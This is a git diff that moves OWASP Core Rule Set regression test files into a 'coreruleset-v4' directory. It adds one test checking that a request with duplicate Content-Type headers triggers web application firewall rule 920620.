a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml new file mode 100644 index 000000000..7fa4b050c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml @@ -0,0 +1,17 @@ +--- +meta: + author: "Andrea (theMiddle) Menin" + enabled: false + name: "920620.yaml" + description: "Tests for 920620" +tests: + - test_title: 920620-1 + desc: Multiple Content-Type request headers + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg==" + output: + log_contains: "id \"920620\"" diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml diff --git 